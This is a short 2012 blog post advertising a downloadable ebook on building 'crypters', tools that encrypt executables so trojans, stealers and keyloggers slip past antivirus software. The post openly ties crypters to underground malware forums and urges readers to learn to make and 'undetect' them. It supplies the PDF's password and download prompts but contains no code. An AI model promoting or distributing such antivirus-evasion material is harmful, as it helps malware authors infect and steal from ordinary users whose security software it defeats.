Crypter ... By the word itself we can understand some kind of encryption etc.,.
Crypter is most commonly used in the underground/malware forums which is mainly used to undetect their virus/trojans/stealers/keyloggers from the antivirus.

but Crypter actual function is to encrypt your Executable file that cannot be reversed which in turn hides or undetects your piece of software/tool/malware from the antivirus.

isn't it interesting ?
So learn what exactly is crypter and how to make it and how to undetect it in this ebook.
i haven't read it but i got it from internet but i have head good reviews about this.
This ebook is mainly for the people who loves to code and covers basic to intermediate stuff about the crypters.
now why waiting download below

Download Below

Password to open the PDF:bluep22

Download the Ebook Here

2:20 AM
0 response
Read More

© 2012 Subhash Dasyam

All rights Reserved

Designed By Template Trackers

background